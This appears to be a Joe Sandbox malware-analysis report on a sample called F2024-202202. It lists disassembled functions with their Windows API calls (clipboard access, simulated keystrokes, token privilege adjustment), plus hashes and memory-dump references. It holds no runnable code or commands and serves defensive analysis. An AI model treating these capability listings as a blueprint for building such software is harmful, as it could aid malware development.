              • String ID:
              • API String ID: 3664257935-0
              • Opcode ID: be19275646b7ac919f5015b380b3a9213bf26bfb30902067346631aa51d76419
              • Instruction ID: 7c23e0f3e7900af3b012b7fea03af1f92e99d6e275bd55aa980d2e75ab85065d
              • Opcode Fuzzy Hash: be19275646b7ac919f5015b380b3a9213bf26bfb30902067346631aa51d76419
              • Instruction Fuzzy Hash: E5F03071505712CFCB34AF68E494812FBE1BF153253218A3EE6D682610CB319944DF40
              Function 001A09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
              Download Yara Rule
              APIs
              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001A09F4
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: LongNamePath_memmove
              • String ID:
              • API String ID: 2514874351-0
              • Opcode ID: c35ff22438be172343df5e77f29b782c74c01dbb3f6e803a07f53fcaec982108
              • Instruction ID: 3f1ea88f7e9203464e4e7bb79edb76ffc6de76c1f16f1346e00ed221e451fc92
              • Opcode Fuzzy Hash: c35ff22438be172343df5e77f29b782c74c01dbb3f6e803a07f53fcaec982108
              • Instruction Fuzzy Hash: 2EE0CD369442285BC720E6989C05FFA77EDDF887A0F0502B5FC0CD7249DA60AD818690
              Function 001E9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __fread_nolock
              • String ID:
              • API String ID: 2638373210-0
              • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
              • Instruction ID: 7e1ba896ef517cb91195514d26ead651302a786a554ae00899417d909f55c289
              • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
              • Instruction Fuzzy Hash: 45E092B0104B405FD7348B24D8107E373E1BB16315F00081CF29A83341EB6278418759
              Function 00185DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
              Download Yara Rule
              APIs
              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,001BE16B,?,?,00000000), ref: 00185DBF
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: cbd9a68a63d1f0ba417f20229570da7d924dd2c740c91a6d0ca37bba62f39af6
              • Instruction ID: 7fd9db45f1b6c76b50227106c579ae5a7777db82ed6176653abcc86c8254218a
              • Opcode Fuzzy Hash: cbd9a68a63d1f0ba417f20229570da7d924dd2c740c91a6d0ca37bba62f39af6
              • Instruction Fuzzy Hash: 8DD0C77564030CBFE710DB80DC46FA9B77CD705710F100194FD0456690D6B27D508795
              Function 001A548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __wfsopen
              • String ID:
              • API String ID: 197181222-0
              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
              • Instruction ID: 68cf261329a21f97298e1b4c7b8baf2a8331f8b6a15e1e2f2ff8059318a4a3e2
              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
              • Instruction Fuzzy Hash: 2FB0927A84420C7BDF012E82EC02A593F1A9B55678F808020FB0C18162A673A6A09689
              Function 001ED2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(00000002,00000000), ref: 001ED46A
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorLast
              • String ID:
              • API String ID: 1452528299-0
              • Opcode ID: b7a0c3dd225d7ce59f2e133fcd1c1c8724703a9608066f366ac1dcf3afdb089a
              • Instruction ID: 03e1ddead0142ac99e0ee5b78fb6c640f1fd212243bb1f4665992c24db0db8c5
              • Opcode Fuzzy Hash: b7a0c3dd225d7ce59f2e133fcd1c1c8724703a9608066f366ac1dcf3afdb089a
              • Instruction Fuzzy Hash: 677162342047418FC718EF25D4D1A6EB7E1AFA8714F14456DF8969B2A1DB30EE05CF52
              Function 001A0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
              • Instruction ID: d8b9acea0358616f9987f0088c5e3f4867fff100f165acc3fc91cd413a3bf178
              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
              • Instruction Fuzzy Hash: 8031E578A00105DFCB1ADF58D480969F7A6FF5E300B658AA9E409DB651D731EEC1DBC0
              Function 014022FC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
              Download Yara Rule
              APIs
              • Sleep.KERNELBASE(000001F4), ref: 01402311
              Memory Dump Source
              • Source File: 00000000.00000002.2016453985.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1400000_F2024-202202.jbxd
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
              • Instruction ID: 5fe101c89807b51601d989c14cbcc7e238695cc33819a8b47cf5721a636143f3
              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
              • Instruction Fuzzy Hash: 52E09A7494010DAFDB01EFB4D6496AE7BB4EF04301F1005A1FD0596691DA709A548A62
              Function 01402300 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
              Download Yara Rule
              APIs
              • Sleep.KERNELBASE(000001F4), ref: 01402311
              Memory Dump Source
              • Source File: 00000000.00000002.2016453985.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1400000_F2024-202202.jbxd
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
              • Instruction ID: 8fe94f9e5b7b06b4581dafd121ffb8c768041325b27c2a8bcdf614575d728e3b
              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
              • Instruction Fuzzy Hash: 28E0E67494010DDFDB00EFB4D64D6AE7FB4EF04301F100561FD01D2281D6709D508A62

              Non-executed Functions

              Function 0020CDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0020CE50
              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0020CE91
              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0020CED6
              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0020CF00
              • SendMessageW.USER32 ref: 0020CF29
              • _wcsncpy.LIBCMT ref: 0020CFA1
              • GetKeyState.USER32(00000011), ref: 0020CFC2
              • GetKeyState.USER32(00000009), ref: 0020CFCF
              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0020CFE5
              • GetKeyState.USER32(00000010), ref: 0020CFEF
              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0020D018
              • SendMessageW.USER32 ref: 0020D03F
              • SendMessageW.USER32(?,00001030,?,0020B602), ref: 0020D145
              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0020D15B
              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0020D16E
              • SetCapture.USER32(?), ref: 0020D177
              • ClientToScreen.USER32(?,?), ref: 0020D1DC
              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0020D1E9
              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0020D203
              • ReleaseCapture.USER32 ref: 0020D20E
              • GetCursorPos.USER32(?), ref: 0020D248
              • ScreenToClient.USER32(?,?), ref: 0020D255
              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0020D2B1
              • SendMessageW.USER32 ref: 0020D2DF
              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0020D31C
              • SendMessageW.USER32 ref: 0020D34B
              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0020D36C
              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0020D37B
              • GetCursorPos.USER32(?), ref: 0020D39B
              • ScreenToClient.USER32(?,?), ref: 0020D3A8
              • GetParent.USER32(?), ref: 0020D3C8
              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0020D431
              • SendMessageW.USER32 ref: 0020D462
              • ClientToScreen.USER32(?,?), ref: 0020D4C0
              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0020D4F0
              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0020D51A
              • SendMessageW.USER32 ref: 0020D53D
              • ClientToScreen.USER32(?,?), ref: 0020D58F
              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0020D5C3
                • Part of subcall function 001825DB: GetWindowLongW.USER32(?,000000EB), ref: 001825EC
              • GetWindowLongW.USER32(?,000000F0), ref: 0020D65F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
              • String ID: @GUI_DRAGID$F$pr$
              • API String ID: 3977979337-1957301577
              • Opcode ID: 4125b8e0d9e23c8aa8e1faed0573c6bacb20dbe91e63aa636997c18abe31dd84
              • Instruction ID: c63cc3c75e13e6bc90b799529076466da0fa0dd83fefb4b8cc967b686bf506f0
              • Opcode Fuzzy Hash: 4125b8e0d9e23c8aa8e1faed0573c6bacb20dbe91e63aa636997c18abe31dd84
              • Instruction Fuzzy Hash: 9342DE74214342AFC725CF68D848EAABBE5FF49314F24061DF695876E2C7319864CF92
              Function 0020804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0020873F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: %d/%02d/%02d
              • API String ID: 3850602802-328681919
              • Opcode ID: a4ee02c6d89e7b9f014eb6afcf34a38611928e26db8ef44e0fd1f5abc739c990
              • Instruction ID: b17735ed170f7171a2f2e22e3a7b02ad557e0fcfbd6fb98c3955f817259d5553
              • Opcode Fuzzy Hash: a4ee02c6d89e7b9f014eb6afcf34a38611928e26db8ef44e0fd1f5abc739c990
              • Instruction Fuzzy Hash: 2012CE71950305AFEB258F24DD49FABBBB8EF49310F204129F955EA2E2DFB08951CB10
              Function 0019710E Relevance: 50.6, APIs: 19, Strings: 7, Instructions: 5093COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memmove$_memset
              • String ID: 0w#$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
              • API String ID: 1357608183-1356228311
              • Opcode ID: d79c05a9716582113d7ee31a527c78c2c6e750ac87e6e5d4dd7a923b0fd29b9a
              • Instruction ID: d06fe32a5a5e8b75cc1315a7e54fcd0b440acc90f64a460db54d152fb63c978d
              • Opcode Fuzzy Hash: d79c05a9716582113d7ee31a527c78c2c6e750ac87e6e5d4dd7a923b0fd29b9a
              • Instruction Fuzzy Hash: EF939F75A00219DBDF28CF98D881BADB7B1FF58710F25816BE955AB380E7709E81CB50
              Function 00184A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
              Download Yara Rule
              APIs
              • GetForegroundWindow.USER32(00000000,?), ref: 00184A3D
              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001BDA8E
              • IsIconic.USER32(?), ref: 001BDA97
              • ShowWindow.USER32(?,00000009), ref: 001BDAA4
              • SetForegroundWindow.USER32(?), ref: 001BDAAE
              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001BDAC4
              • GetCurrentThreadId.KERNEL32 ref: 001BDACB
              • GetWindowThreadProcessId.USER32(?,00000000), ref: 001BDAD7
              • AttachThreadInput.USER32(?,00000000,00000001), ref: 001BDAE8
              • AttachThreadInput.USER32(?,00000000,00000001), ref: 001BDAF0
              • AttachThreadInput.USER32(00000000,?,00000001), ref: 001BDAF8
              • SetForegroundWindow.USER32(?), ref: 001BDAFB
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 001BDB10
              • keybd_event.USER32(00000012,00000000), ref: 001BDB1B
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 001BDB25
              • keybd_event.USER32(00000012,00000000), ref: 001BDB2A
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 001BDB33
              • keybd_event.USER32(00000012,00000000), ref: 001BDB38
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 001BDB42
              • keybd_event.USER32(00000012,00000000), ref: 001BDB47
              • SetForegroundWindow.USER32(?), ref: 001BDB4A
              • AttachThreadInput.USER32(?,?,00000000), ref: 001BDB71
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
              • String ID: Shell_TrayWnd
              • API String ID: 4125248594-2988720461
              • Opcode ID: 35298e21574ab09bd5bee3bced8468e3754987f8155debca664d5fc98e67cfcc
              • Instruction ID: 2571f9937ae29ada5031aba0a653faed753f673294e77291d08f95af6d264b23
              • Opcode Fuzzy Hash: 35298e21574ab09bd5bee3bced8468e3754987f8155debca664d5fc98e67cfcc
              • Instruction Fuzzy Hash: F7317371A80318BFEB356F61AD49FBE7E6CEB44B50F114025FA04EB1D1DBB15900ABA1
              Function 001D8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001D8D0D
                • Part of subcall function 001D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001D8D3A
                • Part of subcall function 001D8CC3: GetLastError.KERNEL32 ref: 001D8D47
              • _memset.LIBCMT ref: 001D889B
              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 001D88ED
              • CloseHandle.KERNEL32(?), ref: 001D88FE
              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001D8915
              • GetProcessWindowStation.USER32 ref: 001D892E
              • SetProcessWindowStation.USER32(00000000), ref: 001D8938
              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 001D8952
                • Part of subcall function 001D8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001D8851), ref: 001D8728
                • Part of subcall function 001D8713: CloseHandle.KERNEL32(?,?,001D8851), ref: 001D873A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
              • String ID: $default$winsta0
              • API String ID: 2063423040-1027155976
              • Opcode ID: ad18a16231f98aa3134f8e3b35fa12a48fc2be58722af39d671f8a06dab8fd38
              • Instruction ID: c0a3fe6f838b0f393895246addb33d0341efbf161483b139a5cfb90e7e0180d4
              • Opcode Fuzzy Hash: ad18a16231f98aa3134f8e3b35fa12a48fc2be58722af39d671f8a06dab8fd38
              • Instruction Fuzzy Hash: B3816D71950209BFDF21DFA4DD49AEEBBB8EF04304F08416AF910A7261DB758E54DB60
              Function 001F425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
              Download Yara Rule
              APIs
              • OpenClipboard.USER32(0020F910), ref: 001F4284
              • IsClipboardFormatAvailable.USER32(0000000D), ref: 001F4292
              • GetClipboardData.USER32(0000000D), ref: 001F429A
              • CloseClipboard.USER32 ref: 001F42A6
              • GlobalLock.KERNEL32(00000000), ref: 001F42C2
              • CloseClipboard.USER32 ref: 001F42CC
              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 001F42E1
              • IsClipboardFormatAvailable.USER32(00000001), ref: 001F42EE
              • GetClipboardData.USER32(00000001), ref: 001F42F6
              • GlobalLock.KERNEL32(00000000), ref: 001F4303
              • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 001F4337
              • CloseClipboard.USER32 ref: 001F4447
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
              • String ID:
              • API String ID: 3222323430-0
              • Opcode ID: 032401656624e722ab7a2567f111ce5bb188c54c0f4e422e52a65c04afbf9a17
              • Instruction ID: 2340e73c70eea97cd6dd30e6feccef2e8ca95351554a49b8cf99e3ac6799d76a
              • Opcode Fuzzy Hash: 032401656624e722ab7a2567f111ce5bb188c54c0f4e422e52a65c04afbf9a17
              • Instruction Fuzzy Hash: 6251AD35244305ABD321FF60ED8AF7F77A8AF94B00F100529FA56D22A2DB70D9058B62
              Function 001EC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
              Download Yara Rule
              APIs
              • FindFirstFileW.KERNEL32(?,?), ref: 001EC9F8
              • FindClose.KERNEL32(00000000), ref: 001ECA4C
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001ECA71
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001ECA88
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 001ECAAF
              • __swprintf.LIBCMT ref: 001ECAFB
              • __swprintf.LIBCMT ref: 001ECB3E
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
              • __swprintf.LIBCMT ref: 001ECB92
                • Part of subcall function 001A38D8: __woutput_l.LIBCMT ref: 001A3931
              • __swprintf.LIBCMT ref: 001ECBE0
                • Part of subcall function 001A38D8: __flsbuf.LIBCMT ref: 001A3953
                • Part of subcall function 001A38D8: __flsbuf.LIBCMT ref: 001A396B
              • __swprintf.LIBCMT ref: 001ECC2F
              • __swprintf.LIBCMT ref: 001ECC7E
              • __swprintf.LIBCMT ref: 001ECCCD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
              • API String ID: 3953360268-2428617273
              • Opcode ID: 70b3d1446f077595974d5c929a7dc467aaf4189d3a561fb49d510a3e89795594
              • Instruction ID: fcaca898dcc05816584f07ed471a46f27631b9775b6970728365181f581a2e03
              • Opcode Fuzzy Hash: 70b3d1446f077595974d5c929a7dc467aaf4189d3a561fb49d510a3e89795594
              • Instruction Fuzzy Hash: 0BA12BB1508344ABC714FBA4CD85DAFB7ECFFA4704F444929B59683191EB34DA09CB62
              Function 001EF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
              Download Yara Rule
              APIs
              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 001EF221
              • _wcscmp.LIBCMT ref: 001EF236
              • _wcscmp.LIBCMT ref: 001EF24D
              • GetFileAttributesW.KERNEL32(?), ref: 001EF25F
              • SetFileAttributesW.KERNEL32(?,?), ref: 001EF279
              • FindNextFileW.KERNEL32(00000000,?), ref: 001EF291
              • FindClose.KERNEL32(00000000), ref: 001EF29C
              • FindFirstFileW.KERNEL32(*.*,?), ref: 001EF2B8
              • _wcscmp.LIBCMT ref: 001EF2DF
              • _wcscmp.LIBCMT ref: 001EF2F6
              • SetCurrentDirectoryW.KERNEL32(?), ref: 001EF308
              • SetCurrentDirectoryW.KERNEL32(0023A5A0), ref: 001EF326
